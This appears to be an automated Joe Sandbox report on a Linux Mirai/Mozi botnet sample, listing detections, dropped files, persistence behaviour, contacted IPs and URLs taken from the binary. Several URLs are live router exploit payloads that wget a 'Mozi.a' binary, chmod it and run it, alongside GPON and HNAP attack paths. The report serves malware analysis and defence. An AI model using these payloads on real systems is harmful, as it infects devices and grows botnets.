                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 397469 Sample: rIbyGX66Op Startdate: 25/04/2021 Architecture: LINUX Score: 100 91 138.94.203.237, 49152 WSPPROGRESSOESERVDETELECOMUNICACAOLTDA-MEBR Brazil 2->91 93 185.149.161.32, 23 ZONATELECOM-ASRU Russian Federation 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 7 other signatures 2->105 12 rIbyGX66Op 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 rIbyGX66Op 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 rIbyGX66Op 20->34         started        file7 83 /usr/sbin/alsa-info.sh, ASCII 34->83 dropped 85 /usr/networks, ELF 34->85 dropped 87 /usr/bin/gettext.sh, ASCII 34->87 dropped 89 21 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 rIbyGX66Op 34->38         started        41 rIbyGX66Op sh 34->41         started        43 rIbyGX66Op sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 rIbyGX66Op sh 38->47         started        49 rIbyGX66Op sh 38->49         started        51 rIbyGX66Op sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                rIbyGX66Op68%VirustotalBrowse
                rIbyGX66Op54%MetadefenderBrowse
                rIbyGX66Op69%ReversingLabsLinux.Trojan.Mirai
                rIbyGX66Op100%AviraLINUX/Mirai.lldau

                Dropped Files

                SourceDetectionScannerLabelLink
                /usr/networks100%AviraLINUX/Mirai.lldau
                /usr/networks54%MetadefenderBrowse
                /usr/networks69%ReversingLabsLinux.Trojan.Mirai

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pastebin.ca)0%Avira URL Cloudsafe
                http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
                http://127.0.0.1:80/GponForm/diag_Form?images/0%VirustotalBrowse
                http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://127.0.0.1:8080/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://95.217.3.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
                http://104.72.178.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://127.0.0.10%Avira URL Cloudsafe
                http://www.alsa-project.org0%Avira URL Cloudsafe
                http://3.11.29.16:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m0%Avira URL Cloudsafe
                http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
                http://127.0.0.1sendcmd0%Avira URL Cloudsafe
                http://164.125.103.242:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
                http://220.130.214.100:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/bin.sh0%Avira URL Cloudsafe
                http://121.5.104.125:80/HNAP1/0%Avira URL Cloudsafe
                http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
                http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
                http://69.195.90.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://www.alsa-project.org.0%Avira URL Cloudsafe
                http://HTTP/1.10%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
                http://34.90.159.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                dht.transmissionbt.com
                212.129.33.59
                truefalse
                  high
                  bttracker.acc.umu.se
                  130.239.18.159
                  truefalse
                    high
                    router.bittorrent.com
                    67.215.246.10
                    truefalse
                      high
                      router.utorrent.com
                      82.221.103.244
                      truefalse
                        high
                        bttracker.debian.org
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:80/GponForm/diag_Form?images/true
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:8080/GponForm/diag_Form?images/false
                          • Avira URL Cloud: safe
                          unknown
                          http://95.217.3.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://104.72.178.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://3.11.29.16:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://164.125.103.242:80/HNAP1/false
                          • Avira URL Cloud: safe
                          unknown
                          http://220.130.214.100:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://121.5.104.125:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://69.195.90.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://34.90.159.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawsfalse
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://pastebin.ca)alsa-info.sh0.8.drfalse
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/bin.sh;chmodrIbyGX66Optrue
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/Mozi.a;chmodrIbyGX66Opfalse
                          • Avira URL Cloud: safe
                          low
                          http://schemas.xmlsoap.org/soap/encoding/rIbyGX66Opfalse
                            high
                            http://%s:%d/Mozi.m;$rIbyGX66Opfalse
                            • Avira URL Cloud: safe
                            low
                            http://schemas.xmlsoap.org/soap/envelope/rIbyGX66Opfalse
                              high
                              http://127.0.0.1rIbyGX66Opfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://baidu.com/%s/%s/%d/%s/%s/%s/%s)rIbyGX66Opfalse
                                high
                                http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.8.drfalse
                                  high
                                  http://www.alsa-project.orgalsa-info.sh0.8.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.pastebin.ca/upload.phpalsa-info.sh0.8.drfalse
                                    high
                                    http://%s:%d/Mozi.mrIbyGX66Opfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.8.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://127.0.0.1sendcmdrIbyGX66Opfalse
                                    • Avira URL Cloud: safe
                                    low
                                    http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.8.drfalse
                                      high
                                      http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.8.drfalse
                                        high
                                        http://ipinfo.io/iprIbyGX66Opfalse
                                          high
                                          http://%s:%d/Mozi.m;/tmp/Mozi.mrIbyGX66Opfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://%s:%d/bin.shrIbyGX66Optrue
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.pastebin.caalsa-info.sh0.8.drfalse
                                            high
                                            http://purenetworks.com/HNAP1/rIbyGX66Opfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.alsa-project.org/alsa-info.shalsa-info.sh0.8.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://%s:%d/Mozi.m;rIbyGX66Opfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.alsa-project.org.alsa-info.sh0.8.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://HTTP/1.1rIbyGX66Opfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://%s:%d/Mozi.a;sh$rIbyGX66Opfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.pastebin.ca.alsa-info.sh0.8.drfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/envelope//rIbyGX66Opfalse
                                                high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                195.157.0.194
                                                unknownUnited Kingdom
                                                8426CLARANET-ASClaraNETLTDGBfalse
                                                96.85.17.58
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                27.197.73.200
                                                unknownChina
                                                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                40.244.52.155
                                                unknownUnited States
                                                4249LILLY-ASUSfalse
                                                118.208.32.220
                                                unknownAustralia
                                                7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                                                220.236.199.32
                                                unknownAustralia
                                                4804MPX-ASMicroplexPTYLTDAUfalse
                                                64.134.176.11
                                                unknownUnited States
                                                14654WAYPORTUSfalse
                                                5.71.245.186
                                                unknownUnited Kingdom
                                                5607BSKYB-BROADBAND-ASGBfalse
                                                13.162.43.135
                                                unknownUnited States
                                                7018ATT-INTERNET4USfalse
                                                97.71.87.134
                                                unknownUnited States
                                                33363BHN-33363USfalse
                                                72.163.148.240
                                                unknownUnited States
                                                109CISCOSYSTEMSUSfalse
                                                39.187.20.227
                                                unknownChina
                                                56041CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationCfalse
                                                175.111.30.198
                                                unknownKorea Republic of
                                                38676FLEXNET-AS-KRflexnetworksKRfalse
                                                96.100.50.191
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                119.215.90.101
                                                unknownKorea Republic of
                                                4766KIXS-AS-KRKoreaTelecomKRfalse
                                                86.170.164.103
                                                unknownUnited Kingdom
                                                2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                                                172.143.86.137
                                                unknownUnited States
                                                7018ATT-INTERNET4USfalse
                                                39.241.4.19
                                                unknownIndonesia
                                                23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                                                196.164.176.188
                                                unknownSouth Africa
                                                328065Vast-Networks-ASZAfalse
                                                46.14.87.211
                                                unknownSwitzerland
                                                3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
                                                14.239.14.115
                                                unknownViet Nam
                                                45899VNPT-AS-VNVNPTCorpVNfalse
                                                35.37.134.166
                                                unknownUnited States
                                                36375UMICH-AS-5USfalse
                                                102.44.180.253
                                                unknownEgypt
                                                8452TE-ASTE-ASEGfalse
                                                166.201.228.49
                                                unknownUnited States
                                                20057ATT-MOBILITY-LLC-AS20057USfalse
                                                136.26.47.177
                                                unknownUnited States
                                                19165WEBPASSUSfalse
                                                178.82.160.65
                                                unknownSwitzerland
                                                6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                                                37.211.3.99
                                                unknownQatar
                                                42298GCC-MPLS-PEERINGGCCMPLSpeeringQAfalse
                                                11.89.47.10
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                124.12.205.156
                                                unknownTaiwan; Republic of China (ROC)
                                                9924TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvifalse
                                                5.232.235.2
                                                unknownIran (ISLAMIC Republic Of)
                                                58224TCIIRfalse
                                                217.131.3.242
                                                unknownTurkey
                                                34984TELLCOM-ASTRfalse
                                                182.9.38.118
                                                unknownIndonesia
                                                23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                                                187.213.209.8
                                                unknownMexico
                                                8151UninetSAdeCVMXfalse
                                                181.113.148.196
                                                unknownEcuador
                                                28006CORPORACIONNACIONALDETELECOMUNICACIONES-CNTEPECfalse
                                                79.116.36.122
                                                unknownRomania
                                                8708RCS-RDS73-75DrStaicoviciROfalse
                                                157.159.2.178
                                                unknownFrance
                                                2094FR-TELECOM-MANAGEMENT-SUDPARISTelecomManagementSudParifalse
                                                133.82.183.72
                                                unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                                                77.187.60.235
                                                unknownGermany
                                                6805TDDE-ASN1DEfalse
                                                221.68.20.5
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                53.117.221.59
                                                unknownGermany
                                                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                                2.164.195.43
                                                unknownGermany
                                                3320DTAGInternetserviceprovideroperationsDEfalse
                                                68.129.151.18
                                                unknownUnited States
                                                701UUNETUSfalse
                                                108.204.197.113
                                                unknownUnited States
                                                7018ATT-INTERNET4USfalse
                                                95.82.71.140
                                                unknownKazakhstan
                                                21299KAR-TEL-ASAlmatyRepublicofKazakhstanKZfalse
                                                128.101.242.184
                                                unknownUnited States
                                                217UMN-SYSTEMUSfalse
                                                185.149.161.32
                                                unknownRussian Federation
                                                61131ZONATELECOM-ASRUfalse
                                                118.191.184.146
                                                unknownChina
                                                59045SUNHONGSGuangzhounavigationinformationtechnologycoLTfalse
                                                221.97.226.130
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                197.67.5.164
                                                unknownSouth Africa
                                                16637MTNNS-ASZAfalse
                                                203.49.228.158
                                                unknownAustralia
                                                1221ASN-TELSTRATelstraCorporationLtdAUfalse
                                                185.189.120.185
                                                unknownIran (ISLAMIC Republic Of)
                                                64413AVAGOSTARIRfalse
                                                117.177.0.80
                                                unknownChina
                                                9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                                194.207.227.221
                                                unknownUnited Kingdom
                                                12390KINGSTON-UK-ASGBfalse
                                                104.222.233.43
                                                unknownUnited States
                                                22552ESITEDUSfalse
                                                208.150.231.33
                                                unknownUnited States
                                                3561CENTURYLINK-LEGACY-SAVVISUSfalse
                                                162.159.107.38
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                120.123.201.216
                                                unknownTaiwan; Republic of China (ROC)
                                                17716NTU-TWNationalTaiwanUniversityTWfalse
                                                87.178.42.105
                                                unknownGermany
                                                3320DTAGInternetserviceprovideroperationsDEfalse
                                                166.231.171.29
                                                unknownUnited States
                                                6614USCC-ASNUSfalse
                                                113.81.33.205
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                18.198.126.226
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                32.26.172.252
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                84.234.82.133
                                                unknownDenmark
                                                16095JAYNETSentiaDanmarkASDKfalse
                                                64.48.220.97
                                                unknownUnited States
                                                2828XO-AS15USfalse
                                                86.18.93.173
                                                unknownUnited Kingdom
                                                5089NTLGBfalse
                                                163.112.176.81
                                                unknownFrance
                                                17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                                                200.161.213.126
                                                unknownBrazil
                                                27699TELEFONICABRASILSABRfalse
                                                32.69.172.174
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                161.141.143.253
                                                unknownCanada
                                                17311ECMC-BGPUSfalse
                                                68.87.138.12
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                91.244.32.53
                                                unknownUkraine
                                                25133MCLAUT-ASUAfalse
                                                175.12.222.235
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                17.103.205.243
                                                unknownUnited States
                                                714APPLE-ENGINEERINGUSfalse
                                                199.247.32.171
                                                unknownUnited States
                                                396982GOOGLE-PRIVATE-CLOUDUSfalse
                                                120.72.175.96
                                                unknownChina
                                                24430CNNIC-CHINAPOST-APCHINASTATEPOSTBUREAUCNfalse
                                                19.21.98.61
                                                unknownUnited States
                                                3MIT-GATEWAYSUSfalse
                                                134.106.59.104
                                                unknownGermany
                                                680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                107.112.161.192
                                                unknownUnited States
                                                46164ATT-MOBILITY-LABSUSfalse
                                                167.13.97.181
                                                unknownUnited States
                                                3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
                                                4.214.87.116
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                53.181.254.20
                                                unknownGermany
                                                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                                115.24.120.43
                                                unknownChina
                                                4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                                                79.73.229.27
                                                unknownUnited Kingdom
                                                9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                                                35.121.101.202
                                                unknownUnited States
                                                237MERIT-AS-14USfalse
                                                94.117.20.210
                                                unknownUnited Kingdom
                                                41012THECLOUDGBfalse
                                                119.100.162.203
                                                unknownChina
                                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                202.146.185.28
                                                unknownunknown
                                                24536ELNUS-AS-IDPTElektrindoDataNusantaraIDfalse
                                                222.121.68.4
                                                unknownKorea Republic of
                                                4766KIXS-AS-KRKoreaTelecomKRfalse
                                                35.224.66.235
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                121.192.9.176
                                                unknownChina
                                                4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                                                201.195.173.239
                                                unknownCosta Rica
                                                11830InstitutoCostarricensedeElectricidadyTelecomCRfalse
                                                155.228.130.68
                                                unknownSwitzerland
                                                25021CIEF-ASEtatdeFribourgSITelCHfalse
                                                128.188.21.157
                                                unknownUnited States
                                                7645DEAKIN-AS-APDeakinUniversityAUfalse
                                                60.234.236.97
                                                unknownNew Zealand
                                                9790VOCUSGROUPNZVocusGroupNZfalse
                                                145.152.174.114
                                                unknownNetherlands
                                                1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                                                138.94.203.237
                                                unknownBrazil
                                                264169WSPPROGRESSOESERVDETELECOMUNICACAOLTDA-MEBRtrue
                                                180.77.237.198
                                                unknownChina
                                                17429BGCTVNETBEIJINGGEHUACATVNETWORKCOLTDCNfalse
                                                159.196.101.170
                                                unknownAustralia
                                                4764WIDEBAND-AS-APAussieBroadbandAUfalse
                                                197.35.48.236
                                                unknownEgypt
                                                8452TE-ASTE-ASEGfalse
                                                175.158.80.139
                                                unknownIndia
                                                33480WEBWERKSAS1USfalse

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:397469
                                                Start date:25.04.2021
                                                Start time:21:12:42
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 6s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:rIbyGX66Op
                                                Cookbook file name:defaultlinuxfilecookbook.jbs
                                                Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                                Analysis Mode:default
                                                Detection:MAL
                                                Classification:mal100.spre.troj.evad.lin@0/221@4/0
                                                Warnings:
                                                Show All
                                                • Excluded IPs from analysis (whitelisted): 91.189.92.40, 91.189.92.19, 91.189.92.41, 91.189.92.39, 91.189.92.20, 91.189.92.38
                                                • TCP Packets have been reduced to 100
                                                • Created / dropped Files have been reduced to 100
                                                • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                                • Report size exceeded maximum capacity and may have missing network information.
                                                • VT rate limit hit for: http://127.0.0.1:8080/GponForm/diag_Form?images/


                                                Runtime Messages

                                                Command:/tmp/rIbyGX66Op
                                                Exit Code:0
                                                Exit Code Info:
                                                Killed:False
                                                Standard Output:

                                                Standard Error:telnetd: no process found
                                                utelnetd: no process found
                                                scfgmgr: no process found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                /bin/sh: 1: cfgtool: not found
                                                /bin/sh: 1: cfgtool: not found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                dht.transmissionbt.comYPJ9DZYIpOGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                bin.shGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                iGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                Mozi.mGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                Photo.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 212.129.33.59
                                                new.exeGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                popcorntime.apkGet hashmaliciousBrowse
                                                • 87.98.162.88
                                                router.bittorrent.comMGuvcs6OczGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                q7uNNDJUI2.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BQGxKexU78.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                FhhkmGmDGr.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                bin.shGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                iGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Mozi.mGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                Photo.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                BitTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.5_41712.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                new.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                3.4.2 build 37754.exeGet hashmaliciousBrowse
                                                • 67.215.246.10
                                                bttracker.acc.umu.seMGuvcs6OczGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                mozi.a.zipGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                bin.shGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                iGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Mozi.mGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                Photo.exeGet hashmaliciousBrowse
                                                • 130.239.18.159
                                                new.exeGet hashmaliciousBrowse
                                                • 130.239.18.159

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                COMCAST-7922USMGuvcs6OczGet hashmaliciousBrowse
                                                • 74.18.244.100
                                                4JQil8gLKdGet hashmaliciousBrowse
                                                • 98.252.198.99
                                                z3hir.x86Get hashmaliciousBrowse
                                                • 174.50.80.69
                                                I6pJq0XN3z.exeGet hashmaliciousBrowse
                                                • 98.229.214.124
                                                v8iFmF7XPp.dllGet hashmaliciousBrowse
                                                • 67.170.250.203
                                                IMG001.exeGet hashmaliciousBrowse
                                                • 25.183.69.138
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 67.164.237.182
                                                0t7Hhj3C8A.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                0t7Hhj3C8A.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                K6wZO4acEf.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                K6wZO4acEf.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                71XqYzXK0E.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                71XqYzXK0E.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                lg2v22DZDI.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                lg2v22DZDI.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                1HdOi3bXbU.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                1HdOi3bXbU.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                GNrSLcqauH.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                GNrSLcqauH.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                3RnrLzhdSN.dllGet hashmaliciousBrowse
                                                • 50.243.30.51
                                                CHINA169-BACKBONECHINAUNICOMChina169BackboneCN4JQil8gLKdGet hashmaliciousBrowse
                                                • 58.16.154.74
                                                2sj75tLtYO.exeGet hashmaliciousBrowse
                                                • 122.114.110.230
                                                DXBR001342103.exeGet hashmaliciousBrowse
                                                • 122.114.18.79
                                                svch.exeGet hashmaliciousBrowse
                                                • 122.114.110.230
                                                z3hir.binGet hashmaliciousBrowse
                                                • 110.252.163.160
                                                SecuriteInfo.com.Variant.Ulise.161906.28000.exeGet hashmaliciousBrowse
                                                • 117.12.41.16
                                                SecuriteInfo.com.Variant.Ulise.161906.28000.exeGet hashmaliciousBrowse
                                                • 117.12.41.16
                                                z3hir.x86Get hashmaliciousBrowse
                                                • 39.88.161.191
                                                123.exeGet hashmaliciousBrowse
                                                • 101.72.205.224
                                                123.exeGet hashmaliciousBrowse
                                                • 101.72.205.224
                                                sample.exeGet hashmaliciousBrowse
                                                • 59.83.204.154
                                                regasm.exeGet hashmaliciousBrowse
                                                • 122.114.110.230
                                                IMG001.exeGet hashmaliciousBrowse
                                                • 153.14.101.251
                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                • 27.210.34.206
                                                test.dllGet hashmaliciousBrowse
                                                • 27.221.54.169
                                                test.dllGet hashmaliciousBrowse
                                                • 27.221.54.169
                                                New Month.exeGet hashmaliciousBrowse
                                                • 122.114.233.10
                                                deIt7iuD1y.exeGet hashmaliciousBrowse
                                                • 119.188.131.134
                                                gy.exeGet hashmaliciousBrowse
                                                • 218.28.116.240
                                                1.shGet hashmaliciousBrowse
                                                • 182.123.58.227
                                                CLARANET-ASClaraNETLTDGBFacture_NJ536LMPM.htmlGet hashmaliciousBrowse
                                                • 195.8.66.1
                                                Invoice 1143.xlsmGet hashmaliciousBrowse
                                                • 195.22.8.68
                                                Invoice 1143.xlsmGet hashmaliciousBrowse
                                                • 195.22.8.68
                                                Invoice 1143.xlsmGet hashmaliciousBrowse
                                                • 195.22.8.68
                                                DetallesBanco.exeGet hashmaliciousBrowse
                                                • 80.172.227.10
                                                Quote.docGet hashmaliciousBrowse
                                                • 195.22.8.66
                                                PO09032021.docGet hashmaliciousBrowse
                                                • 195.22.8.66
                                                U-bolt and nuts.docGet hashmaliciousBrowse
                                                • 195.22.8.66
                                                RFQ-STEEL PIPES-2021.docGet hashmaliciousBrowse
                                                • 195.22.8.66
                                                documentsAP.docGet hashmaliciousBrowse
                                                • 195.22.8.66
                                                https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                • 185.88.105.121
                                                https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                • 185.88.105.121
                                                Shipping documents.exeGet hashmaliciousBrowse
                                                • 188.93.231.230
                                                Aviso de factura.exeGet hashmaliciousBrowse
